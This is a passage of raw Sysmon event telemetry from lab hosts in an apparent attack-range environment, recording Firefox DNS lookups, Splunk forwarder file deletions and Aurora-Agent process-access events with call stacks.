22542200x800000000000000043660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.770{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.detectportal.prod.cloudops.mozgcp.net034.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.769{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240detectportal.firefox.com0type: 5 detectportal.prod.mozaws.net;type: 5 prod.detectportal.prod.cloudops.mozgcp.net;::ffff:34.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.631{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240cs9.wac.phicdn.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.631{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240cs9.wac.phicdn.net072.21.91.29;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000043910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.560{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9528064EC78F599DCDFE9BE413BB68BA,SHA256=304C576BE25F63B2223F1D80D3FD995E162D5CD6D7F22AE275331F9CE6434FA6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.513{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.513{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.513{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.512{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.512{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.512{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.511{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.511{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.511{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.510{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.510{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.509{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.508{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.508{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.508{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.507{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.507{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.507{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.505{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.505{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000043889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:01.505{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 23542300x800000000000000016749Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:01.224{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E07C7CF25E5D951EE86C7BF9DC1061DE,SHA256=A7E02C725928398D42B7BAB8F428AFDE967A18742BA99FAD9F43077DBF180F61,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000043888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.340{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.ingestion-edge.prod.dataops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.340{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.ingestion-edge.prod.dataops.mozgcp.net034.120.208.123;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.244{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240a1887.dscq.akamai.net02600:141f:4000:9::17ca:5a04;2600:141f:4000:9::17ca:5a0e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.243{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240a1887.dscq.akamai.net023.33.22.139;23.33.22.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.243{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;::ffff:23.33.22.142;::ffff:23.33.22.139;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.223{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240cs9.wac.phicdn.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.223{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240cs9.wac.phicdn.net072.21.91.29;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000016748Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:01.025{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=DE5DF2F73D651E4C91CDAA0C3E10D13C,SHA256=549FE78AF755F661F6BFA53FDC76925F3B5F38E76554F8CBDEC3DB40501CA1EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.564{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D882FFC6FBC0D88A3CBE1BD5FADF110D,SHA256=85456ADC7F07129CA0F6169F987D1265C2714B8EDAD42B1713BBF986BBD02362,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016782Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.778{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016781Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.775{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016780Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.773{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016779Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:02.768{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program 